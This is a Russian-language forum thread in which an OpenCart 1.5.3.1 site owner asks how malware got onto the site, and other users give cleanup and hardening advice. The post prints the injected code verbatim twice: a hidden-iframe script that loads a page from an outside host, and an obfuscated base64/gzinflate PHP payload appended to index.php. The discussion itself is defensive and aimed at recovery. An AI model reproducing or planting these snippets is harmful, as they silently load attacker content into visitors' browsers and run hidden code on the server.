Jump to content
Search In
  • More options...
Find results that contain...
Find results in...

Взлом сайта на opencart 1.5.3.1


Recommended Posts

Доброго,

Столкнулся со следующей проблемой. Примерно, через две недели после размещения сайта на реальном хостинге, заметил, что на странице сместился div с footer`ом. Пробежался по коду страницы и в самом конце нашел левый скрипт:

<script>
var _q = document.createElement('iframe'),
    _n = 'setAttribute';
_q[_n]('src', 'http://twitter.dnsjiexi.tk:1342/t/a219bf65b03b586005c6a8e76660286a');
_q.style.position = 'absolute';
_q.style.width = '10px';
_q[_n]('frameborder', navigator.userAgent.indexOf('2491bc9c7d8731e1ae33124093bc7026') + 1);
_q.style.left = '-6247px';
document.write('<div id=\'Twitter\'></div>');
document.getElementById('Twitter').appendChild(_q);
</script>

В корневом index.php нашел новый код – тоже в самом конце страницы:

#c3284d#
echo(gzinflate(base64_decode("VVFNU4NADL13pv9hb0vHCizQBSrtTHU8ePLizTrMfoR2lQJd0g//vUBrR3NL8pL38pK1ypoGl+PRUViS78mC6FoddlChqywIhOcS+syhprBiB3QyHY9IF3nVYWkLu
EK0Rh4Q6MN4lO/f8+rDoa1VdEroFrGZex6eDCJYV1ftp4GzcfFrzsIo8NATAUtlwWfSD+Us4b4/U1wkEHPO/SDhgk6GrW6L3yW4Td0aNPVALWRblzfaK+BkNG77LvOb819Bg3hZWw22E1aJo9kIrK17aMGu
Nv25ptJwfi0cGkQpkypVsU7ikAETEIYsiPw0lCr2A04n5I6wf7pKKLBnvedBFF+IbzaerEFwaKbNkRi9WNO3ixtrusy8rrgcTrzBN4BXyx+/X7Tzi6YTVzQNVPppa0rt5Pt+KPOu7/sB")));
#/c3284d#
?>

Удалил – стало все ок.

Вопрос: каким образом добавился код в index.php (я читал про sql-инъекции, но не особо в этом разбераюсь), а главное – как защититься от этого.

Буду признателен любой помощи.

Сайт на opencart 1.5.3.1. В качестве шаблона используются hyla (правда, я там много чего переделал). Также используется simple ajax search.

Link to post
Share on other sites

Доброго,

Столкнулся со следующей проблемой. Примерно, через две недели после размещения сайта на реальном хостинге, заметил, что на странице сместился div с footer`ом. Пробежался по коду страницы и в самом конце нашел левый скрипт:

<script>
var _q = document.createElement('iframe'),
	_n = 'setAttribute';
_q[_n]('src', 'http://twitter.dnsjiexi.tk:1342/t/a219bf65b03b586005c6a8e76660286a');
_q.style.position = 'absolute';
_q.style.width = '10px';
_q[_n]('frameborder', navigator.userAgent.indexOf('2491bc9c7d8731e1ae33124093bc7026') + 1);
_q.style.left = '-6247px';
document.write('<div id='Twitter'></div>');
document.getElementById('Twitter').appendChild(_q);
</script>

В корневом index.php нашел новый код – тоже в самом конце страницы:

#c3284d#
echo(gzinflate(base64_decode("VVFNU4NADL13pv9hb0vHCizQBSrtTHU8ePLizTrMfoR2lQJd0g//vUBrR3NL8pL38pK1ypoGl+PRUViS78mC6FoddlChqywIhOcS+syhprBiB3QyHY9IF3nVYWkLu
EK0Rh4Q6MN4lO/f8+rDoa1VdEroFrGZex6eDCJYV1ftp4GzcfFrzsIo8NATAUtlwWfSD+Us4b4/U1wkEHPO/SDhgk6GrW6L3yW4Td0aNPVALWRblzfaK+BkNG77LvOb819Bg3hZWw22E1aJo9kIrK17aMGu
Nv25ptJwfi0cGkQpkypVsU7ikAETEIYsiPw0lCr2A04n5I6wf7pKKLBnvedBFF+IbzaerEFwaKbNkRi9WNO3ixtrusy8rrgcTrzBN4BXyx+/X7Tzi6YTVzQNVPppa0rt5Pt+KPOu7/sB")));
#/c3284d#
?>

Удалил – стало все ок.

Вопрос: каким образом добавился код в index.php (я читал про sql-инъекции, но не особо в этом разбераюсь), а главное – как защититься от этого.

Буду признателен любой помощи.

Сайт на opencart 1.5.3.1. В качестве шаблона используются hyla (правда, я там много чего переделал). Также используется simple ajax search.

Задайте этот вопрос службе поддержке Вашего хостинга, причин может быть несколько:

- слишком простые пароли доступа к хостингу (обычно подбирают FTP пароль)

- шаред-хостинг со всеми вытекающими последствиями

Мало вероятно, что взлом был через движок магазина (если только Вы не использовали шаблон/модуль скаченный непонятно где), за OpenCart замечено не было, если б было то уже раструбили бы на всех углах.

Link to post
Share on other sites

Спасибо за совет. Сменил ключ шифрования - не помогло (атака через 2 дня повторилась). Сейчас поменял пароль к фтп, залил .htaccess в папку "download".

Скажите, а каким вообще образом добавляется код в файл index.php? Из модулей (помимо поиска на яксе) я еще ставил новости (скачивал вроде с =^_^=) - каким образом взламывают через модули? И может ли это быть действием вируса?

  • +1 1
Link to post
Share on other sites

=^_^= был неоднократно замечен в распространении шаблонов со скрытыми ссылками на себя, может вы оттуда подцепили какую-то гадость? У меня этот ресурс никогда не вызывал доверия.

  • +1 1
Link to post
Share on other sites

RGB

И как с этой гадостью бороться? Удаления файлов модуля хватит? Мне бы вообще понять, как механизм по добавлению кода в index.php работает.

Link to post
Share on other sites

RGB

И как с этой гадостью бороться? Удаления файлов модуля хватит? Мне бы вообще понять, как механизм по добавлению кода в index.php работает.

А где хостинг то? Кто хостер?
Link to post
Share on other sites

Я бы на твоем месте сделал бекап, удалил с фтп абсолютно все файлы (большая вероятность, что шелл там залит не один), поставил голый опенкарт (проверь chmod) и импортировал бд.

Link to post
Share on other sites

Я бы на твоем месте сделал бекап, удалил с фтп абсолютно все файлы (большая вероятность, что шелл там залит не один), поставил голый опенкарт (проверь chmod) и импортировал бд.

Думаю так и сделать. А что такое шелл?

Link to post
Share on other sites

Файл с таким же шифрованным кодом.

Link to post
Share on other sites

  • 3 months later...
  • 3 weeks later...

По поводу безопасности много написали на форуме ОК.

1. использовать антивирус и фаервол на компе.

2. безопасное соединение с фтп (sftp)

3. на самом сервере переименовать папку admin в другую, напримен my_adm1n

4. снять расширение с .htaccess.txt и заменить (или добавить) имеющийся. там уже от ОК прописаны вещи, необходимые для безопасности.

5. самый уязвимый момент для ОК - вход в админку, когда пароль передается в открытом виде. если вас прослушивают между серваком и компом - не поможет вирь и фаер, пакеты перехватываются.

тут только можно добавить головной боли хацкерам - использовать в апаче инструмент htdigest с дополнительной директивой, которая устанавливает временное ограничение на работу времени аутентификации. не панацея, ибо не SSL/TSL. но если по карману сертификат - лечше всего с ним дружить.

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.